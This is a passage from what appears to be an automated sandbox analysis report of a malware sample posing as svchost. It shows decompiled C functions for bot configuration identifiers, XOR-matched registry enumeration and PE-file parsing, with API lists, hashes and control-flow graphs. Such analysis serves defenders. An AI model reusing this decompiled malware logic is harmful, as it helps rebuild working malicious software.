				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
				if(_t66 == 0) {
					_t77 = E00121B71(); // executed
					_v200 = _t77;
					E0012EA84(1, _t104, _t94, _t77);
					_t113 = _t113 + 0x10;
					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
				}
				_t95 = "hi_id";
				_t67 = E0012E819(1, _t104, "hi_id", 0);
				_t114 = _t113 + 0x10;
				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
				if(_t67 == 0) {
					_t74 = E00121BDF(); // executed
					_v200 = _t74;
					E0012EA84(1, _t104, _t95, _t74);
					_t114 = _t114 + 0x10;
					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
				}
				 *((intOrPtr*)(_t105 + 8)) = 0x61;
				_t96 = E0012E819(1, _t104, "loader_id", 0);
				if(_t96 == 0) {
					_t96 = 4;
					E0012EA84(1, _t104, "loader_id", _t96);
				}
				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
				_t69 = E001230B5(); // executed
				 *((intOrPtr*)(_t105 + 0x34)) = _t69;
				if( *0x13201d == 0) {
					if( *0x13201f == 0) {
						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
					} else {
						if(E00126EC3() != 0) {
							 *(_t105 + 0x18) = 2;
						} else {
							 *(_t105 + 0x18) = 0x10;
						}
					}
				} else {
					 *(_t105 + 0x18) = 1;
				}
				if(_v196 != 0) {
					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
				}
				_t71 = GetTickCount() / 0x3e8;
				 *0x132110 = _t71;
				 *(_t105 + 0x28) = _t71;
				return _t71;
			}






























                                                                                0x00121d9f
                                                                                0x00121da9
                                                                                0x00121daf
                                                                                0x00121db4
                                                                                0x00121dbc
                                                                                0x00121dbe
                                                                                0x00121dce
                                                                                0x00121de0
                                                                                0x00121dd0
                                                                                0x00121ddb
                                                                                0x00121ddb
                                                                                0x00121de8
                                                                                0x00121dfc
                                                                                0x00121dff
                                                                                0x00121e10
                                                                                0x00121e14
                                                                                0x00121e22
                                                                                0x00121e22
                                                                                0x00121e2a
                                                                                0x00121e34
                                                                                0x00121e38
                                                                                0x00121e3e
                                                                                0x00121e46
                                                                                0x00121e4e
                                                                                0x00121e51
                                                                                0x00121e54
                                                                                0x00121e59
                                                                                0x00121e64
                                                                                0x00121e67
                                                                                0x00121e72
                                                                                0x00121e77
                                                                                0x00121e77
                                                                                0x00121e7f
                                                                                0x00121e84
                                                                                0x00121e8e
                                                                                0x00121e93
                                                                                0x00121e96
                                                                                0x00121e99
                                                                                0x00121ea0
                                                                                0x00121ea8
                                                                                0x00121ea2
                                                                                0x00121ea2
                                                                                0x00121ea2
                                                                                0x00121eb4
                                                                                0x00121eb9
                                                                                0x00121ebc
                                                                                0x00121ec1
                                                                                0x00121ec9
                                                                                0x00121ed3
                                                                                0x00121ed8
                                                                                0x00121edb
                                                                                0x00121ede
                                                                                0x00121ede
                                                                                0x00121ee1
                                                                                0x00121ee9
                                                                                0x00121eee
                                                                                0x00121ef1
                                                                                0x00121ef6
                                                                                0x00121ef8
                                                                                0x00121f01
                                                                                0x00121f05
                                                                                0x00121f0e
                                                                                0x00121f11
                                                                                0x00121f11
                                                                                0x00121f16
                                                                                0x00121f1e
                                                                                0x00121f23
                                                                                0x00121f26
                                                                                0x00121f2b
                                                                                0x00121f2d
                                                                                0x00121f36
                                                                                0x00121f3a
                                                                                0x00121f43
                                                                                0x00121f46
                                                                                0x00121f46
                                                                                0x00121f52
                                                                                0x00121f5e
                                                                                0x00121f65
                                                                                0x00121f69
                                                                                0x00121f72
                                                                                0x00121f77
                                                                                0x00121f7a
                                                                                0x00121f7d
                                                                                0x00121f82
                                                                                0x00121f8c
                                                                                0x00121f9a
                                                                                0x00121fb7
                                                                                0x00121f9c
                                                                                0x00121fa3
                                                                                0x00121fae
                                                                                0x00121fa5
                                                                                0x00121fa5
                                                                                0x00121fa5
                                                                                0x00121fa3
                                                                                0x00121f8e
                                                                                0x00121f8e
                                                                                0x00121f8e
                                                                                0x00121fc0
                                                                                0x00121fc2
                                                                                0x00121fc2
                                                                                0x00121fd6
                                                                                0x00121fd9
                                                                                0x00121fde
                                                                                0x00121fea

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 00121DC6
                                                                                • GetSystemInfo.KERNEL32(?), ref: 00121DE8
                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00121E03
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00121E0A
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00121E1B
                                                                                • GetTickCount.KERNEL32 ref: 00121FC9
                                                                                  • Part of subcall function 00121BDF: GetComputerNameA.KERNEL32(?,0000000F), ref: 00121C15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                • String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                • API String ID: 4207808166-1381319158
                                                                                • Opcode ID: 79f174784c01a340a8dddc836ca297e83c98aff889ca4755841d5dee90f13928
                                                                                • Instruction ID: d2a40711310c26ec95492115e99714167eb8c0398097a90bea0bdbb453c0ed3f
                                                                                • Opcode Fuzzy Hash: 79f174784c01a340a8dddc836ca297e83c98aff889ca4755841d5dee90f13928
                                                                                • Instruction Fuzzy Hash: 3351C1B09043547FE320EF75AC86F67BAECFB68704F04091DF59682542E774A928C7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 001273FF Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 345registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 999 1273ff-127419 1000 12741b 999->1000 1001 12741d-127422 999->1001 1000->1001 1002 127426-12742b 1001->1002 1003 127424 1001->1003 1004 127430-127435 1002->1004 1005 12742d 1002->1005 1003->1002 1006 127437 1004->1006 1007 12743a-127481 call 126dc2 call 122544 RegOpenKeyExA 1004->1007 1005->1004 1006->1007 1012 127487-12749d call 12ee2a 1007->1012 1013 1277f9-1277fe call 12ee2a 1007->1013 1018 127703-12770e RegEnumKeyA 1012->1018 1019 127801 1013->1019 1020 1274a2-1274b1 call 126cad 1018->1020 1021 127714-12771d RegCloseKey 1018->1021 1022 127804-127808 1019->1022 1025 1274b7-1274cc call 12f1a5 1020->1025 1026 1276ed-127700 1020->1026 1021->1019 1025->1026 1029 1274d2-1274f8 RegOpenKeyExA 1025->1029 1026->1018 1030 127727-12772a 1029->1030 1031 1274fe-127530 call 122544 RegQueryValueExA 1029->1031 1032 127755-127764 call 12ee2a 1030->1032 1033 12772c-127740 call 12ef00 1030->1033 1031->1030 1040 127536-12753c 1031->1040 1041 1276df-1276e2 1032->1041 1042 127742-127745 RegCloseKey 1033->1042 1043 12774b-12774e 1033->1043 1044 12753f-127544 1040->1044 1041->1026 1047 1276e4-1276e7 RegCloseKey 1041->1047 1042->1043 1046 1277ec-1277f7 RegCloseKey 1043->1046 1044->1044 1045 127546-12754b 1044->1045 1045->1032 1048 127551-12756b call 12ee95 1045->1048 1046->1022 1047->1026 1048->1032 1051 127571-127593 call 122544 call 12ee95 1048->1051 1056 127753 1051->1056 1057 127599-1275a0 1051->1057 1056->1032 1058 1275a2-1275c6 call 12ef00 call 12ed03 1057->1058 1059 1275c8-1275d7 call 12ed03 1057->1059 1064 1275d8-1275da 1058->1064 1059->1064 1066 1275df-127623 call 12ee95 call 122544 call 12ee95 call 12ee2a 1064->1066 1067 1275dc 1064->1067 1077 127626-12762b 1066->1077 1067->1066 1077->1077 1078 12762d-127634 1077->1078 1079 127637-12763c 1078->1079 1079->1079 1080 12763e-127642 1079->1080 1081 127644-127656 call 12ed77 1080->1081 1082 12765c-127673 call 12ed23 1080->1082 1081->1082 1087 127769-12777c call 12ef00 1081->1087 1088 127680 1082->1088 1089 127675-12767e 1082->1089 1094 1277e3-1277e6 RegCloseKey 1087->1094 1091 127683-12768e call 126cad 1088->1091 1089->1091 1096 127722-127725 1091->1096 1097 127694-1276bf call 12f1a5 call 126c96 1091->1097 1094->1046 1098 1276dd 1096->1098 1103 1276c1-1276c7 1097->1103 1104 1276d8 1097->1104 1098->1041 1103->1104 1105 1276c9-1276d2 1103->1105 1104->1098 1105->1104 1106 12777e-127797 GetFileAttributesExA 1105->1106 1107 12779a-12779f 1106->1107 1108 127799 1106->1108 1109 1277a3-1277a8 1107->1109 1110 1277a1 1107->1110 1108->1107 1111 1277c4-1277c8 1109->1111 1112 1277aa-1277c0 call 12ee08 1109->1112 1110->1109 1113 1277d7-1277dc 1111->1113 1114 1277ca-1277d6 call 12ef00 1111->1114 1112->1111 1117 1277e0-1277e2 1113->1117 1118 1277de 1113->1118 1114->1113 1117->1094 1118->1117
                                                                                C-Code - Quality: 76%
                                                                                			E001273FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
				CHAR* _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int* _v24;
				char* _v28;
				intOrPtr _v32;
				int _v36;
				char _v295;
				char _v296;
				char _v556;
				void _v592;
				intOrPtr* _t85;
				int** _t86;
				char* _t87;
				char* _t88;
				char* _t91;
				long _t92;
				signed int _t93;
				long _t97;
				signed int _t103;
				long _t107;
				char* _t118;
				intOrPtr* _t119;
				CHAR* _t123;
				void* _t125;
				char* _t127;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr _t137;
				signed int* _t146;
				int** _t147;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				intOrPtr _t172;
				intOrPtr* _t173;
				void* _t186;
				intOrPtr _t187;
				int* _t188;
				void* _t190;
				void* _t191;
				char* _t192;
				signed int _t194;
				int* _t196;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;

				_t165 = __ecx;
				_t85 = _a8;
				_t188 = 0;
				_v16 = 0x104;
				if(_t85 != 0) {
					 *_t85 = 0;
				}
				_t86 = _a12;
				if(_t86 != _t188) {
					 *_t86 = _t188;
				}
				_t87 = _a16;
				if(_t87 != _t188) {
					 *_t87 = 0;
				}
				_t88 = _a20;
				if(_t88 != _t188) {
					 *_t88 = 0;
				}
				_v32 = E00126DC2(_t165);
				_t160 = 0xe4;
				_t91 = E00122544(0x1322f8, 0x1306e8, 0x22, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
				_push(0x100);
				_push(_t188);
				_push(0x1322f8);
				if(_t92 != 0) {
					_t93 = E0012EE2A(_t165);
					goto L66;
				} else {
					E0012EE2A(_t165);
					_t206 = _t204 + 0xc;
					_push(_v16);
					_push( &_v556);
					_v24 = _t188;
					_push(_t188);
					while(1) {
						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
						if(_t97 != 0) {
							break;
						}
						if(E00126CAD( &_v556) == 0) {
							L41:
							_v24 =  &(_v24[0]);
							_push(0x104);
							_v16 = 0x104;
							_push( &_v556);
							_push(_v24);
							continue;
						}
						_t103 = E0012F1A5( &_v556);
						_pop(_t167);
						if((_t103 ^ 0x61616161) != _v32) {
							goto L41;
						}
						_v12 = _t188;
						_v16 = 0x104;
						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12); // executed
						if(_t107 != _t188) {
							L45:
							if(_t107 != 5) {
								L50:
								E0012EE2A(_t167, 0x1322f8, _t188, 0x100);
								_t206 = _t206 + 0xc;
								L39:
								if(_v12 != _t188) {
									RegCloseKey(_v12);
								}
								goto L41;
							}
							E0012EF00(_a16,  &_v556);
							if(_v12 != _t188) {
								RegCloseKey(_v12);
							}
							_push(4);
							_pop(0);
							L64:
							RegCloseKey(_v20);
							return 0;
						}
						_t118 = E00122544(0x1322f8, 0x1306dc, 0xa, _t160, 0xc8);
						_t206 = _t206 + 0x14;
						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16); // executed
						if(_t107 != _t188) {
							goto L45;
						}
						_t119 =  &_v556;
						_t186 = _t119 + 1;
						do {
							_t167 =  *_t119;
							_t119 = _t119 + 1;
						} while (_t167 != 0);
						if(_v16 <= _t119 - _t186) {
							goto L50;
						}
						_t123 = E0012EE95( &_v296,  &_v556);
						_pop(_t167);
						_v8 = _t123;
						if(_t123 == _t188) {
							goto L50;
						}
						_t125 = E0012EE95(_v8, E00122544(0x1322f8, 0x130694, 5, _t160, 0xc8));
						_t206 = _t206 + 0x1c;
						if(_t125 == 0) {
							_t188 = 0;
							goto L50;
						}
						if(_v296 != 0x22) {
							_t127 = E0012ED03( &_v296, 0x20);
							_pop(_t167);
						} else {
							E0012EF00( &_v296,  &_v295);
							_t127 = E0012ED03( &_v296, 0x22);
							_t206 = _t206 + 0x10;
						}
						if(_t127 != 0) {
							 *_t127 = 0;
						}
						_v8 = E0012EE95( &_v296,  &_v556);
						_v28 = E0012EE95(_v8, E00122544(0x1322f8, 0x130694, 5, _t160, 0xc8));
						E0012EE2A(_t167, 0x1322f8, 0, 0x100);
						_t134 = _a4;
						_t206 = _t206 + 0x30;
						_t190 = _t134 + 1;
						do {
							_t172 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t172 != 0);
						_t173 = _v8;
						_t191 = _t134 - _t190;
						_t43 = _t173 + 1; // 0x1
						_t136 = _t43;
						do {
							_t187 =  *_t173;
							_t173 = _t173 + 1;
						} while (_t187 != 0);
						_t174 = _t173 - _t136;
						if(_t191 <= _t173 - _t136 || E0012ED77(_t191 - _t174 + _a4, _v8) != 0) {
							_t192 = _v28;
							 *_t192 = 0;
							_t137 = E0012ED23(_v8, 0x5c);
							_v8 = _t137;
							if(_t137 != 0) {
								_v8 = _v8 + 1;
							} else {
								_v8 =  &_v296;
							}
							if(E00126CAD(_v8) == 0) {
								 *_t192 = 0x2e;
								goto L38;
							} else {
								_t194 = E0012F1A5(_v8) ^ 0x61616161;
								_t163 = _t194 >> 0x00000008 & 0x000000ff;
								 *_v28 = 0x2e;
								if(E00126C96(_t194) != 0) {
									L37:
									_t160 = 0xe4;
									L38:
									_t188 = 0;
									goto L39;
								}
								_t56 = _t163 - 0x51; // -81
								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
									goto L37;
								} else {
									_t196 = 0;
									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
										_t196 = 1;
									}
									_t146 = _a8;
									if(_t146 != 0) {
										 *_t146 = _t163;
									}
									_t164 = _a16;
									if(_t164 != 0) {
										_t202 = _v8 -  &_v296;
										E0012EE08(_t164,  &_v296, _t202);
										 *((char*)(_t202 + _t164)) = 0;
									}
									if(_a20 != 0) {
										E0012EF00(_a20, _v8);
									}
									_t147 = _a12;
									if(_t147 != 0) {
										 *_t147 = _t196;
									}
									_push(3);
									_pop(0);
									goto L63;
								}
							}
						} else {
							E0012EF00(_a16,  &_v556);
							L63:
							RegCloseKey(_v12); // executed
							goto L64;
						}
					}
					_t93 = RegCloseKey(_v20);
					L66:
					return _t93 | 0xffffffff;
				}
			}






















































                                                                                0x001273ff
                                                                                0x00127408
                                                                                0x0012740e
                                                                                0x00127410
                                                                                0x00127419
                                                                                0x0012741b
                                                                                0x0012741b
                                                                                0x0012741d
                                                                                0x00127422
                                                                                0x00127424
                                                                                0x00127424
                                                                                0x00127426
                                                                                0x0012742b
                                                                                0x0012742d
                                                                                0x0012742d
                                                                                0x00127430
                                                                                0x00127435
                                                                                0x00127437
                                                                                0x00127437
                                                                                0x0012743f
                                                                                0x00127451
                                                                                0x00127464
                                                                                0x00127469
                                                                                0x00127472
                                                                                0x00127478
                                                                                0x0012747d
                                                                                0x0012747e
                                                                                0x00127481
                                                                                0x001277f9
                                                                                0x00000000
                                                                                0x00127487
                                                                                0x00127487
                                                                                0x0012748c
                                                                                0x0012748f
                                                                                0x00127498
                                                                                0x00127499
                                                                                0x0012749c
                                                                                0x00127703
                                                                                0x00127706
                                                                                0x0012770e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001274b1
                                                                                0x001276ed
                                                                                0x001276ed
                                                                                0x001276f5
                                                                                0x001276f6
                                                                                0x001276ff
                                                                                0x00127700
                                                                                0x00000000
                                                                                0x00127700
                                                                                0x001274be
                                                                                0x001274c8
                                                                                0x001274cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001274e6
                                                                                0x001274e9
                                                                                0x001274f0
                                                                                0x001274f8
                                                                                0x00127727
                                                                                0x0012772a
                                                                                0x00127755
                                                                                0x0012775c
                                                                                0x00127761
                                                                                0x001276df
                                                                                0x001276e2
                                                                                0x001276e7
                                                                                0x001276e7
                                                                                0x00000000
                                                                                0x001276e2
                                                                                0x00127736
                                                                                0x00127740
                                                                                0x00127745
                                                                                0x00127745
                                                                                0x0012774b
                                                                                0x0012774d
                                                                                0x001277ec
                                                                                0x001277ef
                                                                                0x00000000
                                                                                0x001277f5
                                                                                0x0012751c
                                                                                0x00127521
                                                                                0x00127528
                                                                                0x00127530
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127536
                                                                                0x0012753c
                                                                                0x0012753f
                                                                                0x0012753f
                                                                                0x00127541
                                                                                0x00127542
                                                                                0x0012754b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012755f
                                                                                0x00127565
                                                                                0x00127566
                                                                                0x0012756b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127589
                                                                                0x0012758e
                                                                                0x00127593
                                                                                0x00127753
                                                                                0x00000000
                                                                                0x00127753
                                                                                0x001275a0
                                                                                0x001275d1
                                                                                0x001275d7
                                                                                0x001275a2
                                                                                0x001275b0
                                                                                0x001275be
                                                                                0x001275c3
                                                                                0x001275c3
                                                                                0x001275da
                                                                                0x001275dc
                                                                                0x001275dc
                                                                                0x001275fc
                                                                                0x00127615
                                                                                0x00127618
                                                                                0x0012761d
                                                                                0x00127620
                                                                                0x00127623
                                                                                0x00127626
                                                                                0x00127626
                                                                                0x00127628
                                                                                0x00127629
                                                                                0x0012762d
                                                                                0x00127632
                                                                                0x00127634
                                                                                0x00127634
                                                                                0x00127637
                                                                                0x00127637
                                                                                0x00127639
                                                                                0x0012763a
                                                                                0x0012763e
                                                                                0x00127642
                                                                                0x0012765c
                                                                                0x00127664
                                                                                0x00127667
                                                                                0x0012766e
                                                                                0x00127673
                                                                                0x00127680
                                                                                0x00127675
                                                                                0x0012767b
                                                                                0x0012767b
                                                                                0x0012768e
                                                                                0x00127722
                                                                                0x00000000
                                                                                0x00127694
                                                                                0x001276a1
                                                                                0x001276ad
                                                                                0x001276b3
                                                                                0x001276bf
                                                                                0x001276d8
                                                                                0x001276d8
                                                                                0x001276dd
                                                                                0x001276dd
                                                                                0x00000000
                                                                                0x001276dd
                                                                                0x001276c1
                                                                                0x001276c7
                                                                                0x00000000
                                                                                0x0012777e
                                                                                0x00127785
                                                                                0x00127797
                                                                                0x00127799
                                                                                0x00127799
                                                                                0x0012779a
                                                                                0x0012779f
                                                                                0x001277a1
                                                                                0x001277a1
                                                                                0x001277a3
                                                                                0x001277a8
                                                                                0x001277b3
                                                                                0x001277b8
                                                                                0x001277c0
                                                                                0x001277c0
                                                                                0x001277c8
                                                                                0x001277d0
                                                                                0x001277d6
                                                                                0x001277d7
                                                                                0x001277dc
                                                                                0x001277de
                                                                                0x001277de
                                                                                0x001277e0
                                                                                0x001277e2
                                                                                0x00000000
                                                                                0x001277e2
                                                                                0x001276c7
                                                                                0x00127769
                                                                                0x00127773
                                                                                0x001277e3
                                                                                0x001277e6
                                                                                0x00000000
                                                                                0x001277e6
                                                                                0x00127642
                                                                                0x00127717
                                                                                0x00127801
                                                                                0x00000000
                                                                                0x00127801

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,74CB43E0,00000000), ref: 00127472
                                                                                • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000101,?,?,?,?,?,?,?,74CB43E0,00000000), ref: 001274F0
                                                                                • RegQueryValueExA.KERNEL32(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,74CB43E0,00000000), ref: 00127528
                                                                                • ___ascii_stricmp.LIBCMT ref: 0012764D
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,74CB43E0,00000000), ref: 001276E7
                                                                                • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00127706
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,74CB43E0,00000000), ref: 00127717
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,74CB43E0,00000000), ref: 00127745
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,74CB43E0,00000000), ref: 001277EF
                                                                                  • Part of subcall function 0012F1A5: lstrlenA.KERNEL32(000000C8,000000E4,001322F8,000000C8,00127150,?), ref: 0012F1AD
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0012778F
                                                                                • RegCloseKey.KERNEL32(?), ref: 001277E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                • String ID: "
                                                                                • API String ID: 3433985886-123907689
                                                                                • Opcode ID: 8402a00818a9cf2a8dc4d14039d41aa67f5345b39a0a035a6363b06e31d017ab
                                                                                • Instruction ID: 29c6374012e37dfeb1bbcf9e8271e44c556924c5ca52cb23a299fe7f112fb78e
                                                                                • Opcode Fuzzy Hash: 8402a00818a9cf2a8dc4d14039d41aa67f5345b39a0a035a6363b06e31d017ab
                                                                                • Instruction Fuzzy Hash: A5C1A171904229AFEB119FA4EC49FEFBBF9EF55310F1400A5F504E6191EB309EA48B60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012675C Relevance: 19.7, APIs: 13, Instructions: 199fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1121 12675c-126778 1122 126784-1267a2 CreateFileA 1121->1122 1123 12677a-12677e SetFileAttributesA 1121->1123 1124 1267a4-1267b2 CreateFileA 1122->1124 1125 1267b5-1267b8 1122->1125 1123->1122 1124->1125 1126 1267c5-1267c9 1125->1126 1127 1267ba-1267bf SetFileAttributesA 1125->1127 1128 126977-126986 1126->1128 1129 1267cf-1267df GetFileSize 1126->1129 1127->1126 1130 1267e5-1267e7 1129->1130 1131 12696b 1129->1131 1130->1131 1133 1267ed-12680b ReadFile 1130->1133 1132 12696e-126971 FindCloseChangeNotification 1131->1132 1132->1128 1133->1131 1134 126811-126824 SetFilePointer 1133->1134 1134->1131 1135 12682a-126842 ReadFile 1134->1135 1135->1131 1136 126848-126861 SetFilePointer 1135->1136 1136->1131 1137 126867-126876 1136->1137 1138 1268d5-1268df 1137->1138 1139 126878-12688f ReadFile 1137->1139 1138->1132 1140 1268e5-1268eb 1138->1140 1141 1268d2 1139->1141 1142 126891-12689e 1139->1142 1143 1268f0-1268fe call 12ebcc 1140->1143 1144 1268ed 1140->1144 1141->1138 1145 1268a0-1268b5 1142->1145 1146 1268b7-1268ba 1142->1146 1143->1131 1153 126900-12690b SetFilePointer 1143->1153 1144->1143 1147 1268bd-1268c3 1145->1147 1146->1147 1149 1268c5 1147->1149 1150 1268c8-1268ce 1147->1150 1149->1150 1150->1139 1152 1268d0 1150->1152 1152->1138 1154 12695a-126969 call 12ec2e 1153->1154 1155 12690d-126920 ReadFile 1153->1155 1154->1132 1155->1154 1156 126922-126958 1155->1156 1156->1132
                                                                                C-Code - Quality: 100%
                                                                                			E0012675C(CHAR* _a4, long* _a8, long _a12) {
				long _v8;
				void* _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				struct _OVERLAPPED* _v24;
				long _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				void _v68;
				long _v72;
				void _v132;
				intOrPtr _v320;
				signed int _v360;
				signed int _v374;
				void _v380;
				void* _t85;
				long _t88;
				int _t92;
				long _t93;
				int _t96;
				long _t99;
				long _t102;
				struct _OVERLAPPED* _t103;
				long _t104;
				long _t115;
				long _t120;
				signed int _t143;
				void* _t146;

				_v16 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 0x80);
				}
				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_v12 = _t85;
				if(_t85 == 0xffffffff) {
					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
				}
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 2);
				}
				if(_v12 != 0xffffffff) {
					_t88 = GetFileSize(_v12, 0);
					_v8 = _t88;
					if(_t88 == 0xffffffff || _t88 == 0) {
						L31:
						_v8 = 0;
					} else {
						_a12 = 0;
						_v28 = 0;
						_t92 = ReadFile(_v12,  &_v132, 0x40,  &_a12, 0); // executed
						if(_t92 == 0) {
							goto L31;
						} else {
							_t93 = SetFilePointer(_v12, _v72, 0, 0); // executed
							if(_t93 == 0xffffffff) {
								goto L31;
							} else {
								_t96 = ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0); // executed
								if(_t96 == 0) {
									goto L31;
								} else {
									_t99 = SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0); // executed
									if(_t99 == 0xffffffff) {
										goto L31;
									} else {
										_v20 = 0;
										_v24 = 0;
										if(0 < _v374) {
											while(1) {
												_t115 = 0x28;
												_a12 = _t115;
												if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
													break;
												}
												_t143 = _v374 & 0x0000ffff;
												if(_v24 != _t143 - 1) {
													_t120 = _v48 + _v52;
												} else {
													_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
												}
												_a12 = _t120;
												if(_v20 < _t120) {
													_v20 = _t120;
												}
												_v24 = _v24 + 1;
												if(_v24 < _t143) {
													continue;
												} else {
												}
												goto L23;
											}
											_v8 = 0;
										}
										L23:
										if(_v24 >= (_v374 & 0x0000ffff)) {
											_t102 = _v20;
											if(_v8 > _t102) {
												_v8 = _t102;
											}
											_t103 = E0012EBCC(_v8);
											_v16 = _t103;
											if(_t103 == 0) {
												goto L31;
											} else {
												_t104 = SetFilePointer(_v12, 0, 0, 0); // executed
												if(_t104 == 0xffffffff) {
													L30:
													_v8 = 0;
													E0012EC2E(_v16);
													_v16 = 0;
												} else {
													_t146 = _v16;
													if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
														goto L30;
													} else {
														 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
														_v8 = _v20;
													}
												}
											}
										}
									}
								}
							}
						}
					}
					FindCloseChangeNotification(_v12); // executed
				}
				 *_a8 = _v8;
				return _v16;
			}
































                                                                                0x0012676a
                                                                                0x0012676d
                                                                                0x00126778
                                                                                0x0012677e
                                                                                0x0012677e
                                                                                0x0012679a
                                                                                0x0012679c
                                                                                0x001267a2
                                                                                0x001267b2
                                                                                0x001267b2
                                                                                0x001267b8
                                                                                0x001267bf
                                                                                0x001267bf
                                                                                0x001267c9
                                                                                0x001267d3
                                                                                0x001267d9
                                                                                0x001267df
                                                                                0x0012696b
                                                                                0x0012696b
                                                                                0x001267ed
                                                                                0x00126801
                                                                                0x00126804
                                                                                0x00126807
                                                                                0x0012680b
                                                                                0x00000000
                                                                                0x00126811
                                                                                0x0012681f
                                                                                0x00126824
                                                                                0x00000000
                                                                                0x0012682a
                                                                                0x0012683e
                                                                                0x00126842
                                                                                0x00000000
                                                                                0x00126848
                                                                                0x0012685c
                                                                                0x00126861
                                                                                0x00000000
                                                                                0x00126867
                                                                                0x00126869
                                                                                0x0012686c
                                                                                0x00126876
                                                                                0x00126878
                                                                                0x0012687a
                                                                                0x00126881
                                                                                0x0012688f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00126891
                                                                                0x0012689e
                                                                                0x001268ba
                                                                                0x001268a0
                                                                                0x001268b2
                                                                                0x001268b2
                                                                                0x001268bd
                                                                                0x001268c3
                                                                                0x001268c5
                                                                                0x001268c5
                                                                                0x001268c8
                                                                                0x001268ce
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001268d0
                                                                                0x00000000
                                                                                0x001268ce
                                                                                0x001268d2
                                                                                0x001268d2
                                                                                0x001268d5
                                                                                0x001268df
                                                                                0x001268e5
                                                                                0x001268eb
                                                                                0x001268ed
                                                                                0x001268ed
                                                                                0x001268f3
                                                                                0x001268f9
                                                                                0x001268fe
                                                                                0x00000000
                                                                                0x00126900
                                                                                0x00126906
                                                                                0x0012690b
                                                                                0x0012695a
                                                                                0x0012695d
                                                                                0x00126960
                                                                                0x00126966
                                                                                0x0012690d
